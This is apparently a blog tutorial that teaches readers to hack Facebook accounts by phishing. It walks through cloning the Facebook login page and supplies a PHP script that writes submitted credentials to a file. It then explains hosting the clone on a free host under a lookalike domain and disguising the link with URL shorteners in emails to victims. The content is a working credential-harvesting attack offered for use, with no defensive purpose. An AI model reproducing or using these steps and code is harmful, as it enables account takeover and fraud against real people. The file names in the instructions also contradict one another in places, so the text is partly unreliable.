Whatever your reason is, follow along in this tutorial as I give you a step-by-step guide.
Lets Begin
In order to hack any Facebook account, we are going to employ a method known as social engineering.We are going to base on human emotions and insecurities for this. Phishing is a popular method for hacking and that's what we will use today.
HACK ANY FACEBOOK ACCOUNT: PHISHING
With this method, we are going to build a website to look just like the original Facebook login page. So anytime a victim logs into Facebook using our link, the login credentials will then be saved onto our server which is accessible to us. It's as easy as that.HACK ANY FACEBOOK ACCOUNT - METHOD:
1. Visit Facebook's original login page and right-click on the site. Choose "view source code" from the popup that appears.
2. You should be viewing a lot of "nonsense" on your screen after the first step. Select everything and copy it.
3. Create a new notepad file and save it as "index.html". Paste the copied code into this file.
4. In the "index.html" file, hold "ctrl+F" and search for "action", there should be something like this
action="/login/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjcwMTYyNDQ4LCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D"
5. Delete everything inside the quotes and replace it with "post.php".
6. Now save it and create a new file and save it as "post.php". Copy and paste the code below into it and save it.
<?php
header ('Location: posts.php');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
We have successfully created our phishing page. In order to make the site accessible to our victims we need to host the website on the internet.
To Do That:
1. Visit "profreehost.com". Register an account and then click on "create new account".
2. Select the free domain option and type in something like "verify.faceboookk" and choose an extension.
3 Now go over to the file manager section and open up the "public_html" folder and upload the "index.html" and "post.php" files.
3. Now save it. We are done. Time to test it.
Visit your website's domain and should open up something like Facebook. Try again and then go back to your files manager. A new file should be created, the "username.txt" file. Open I and it should contain your login details.
To make the link less suspicious, use URL shorteners like bitly. Send the shortened link in emails like this to your victim.




0 Comments
Got a question or suggestion you wanna add up? Leave a comment here and I will reply to you.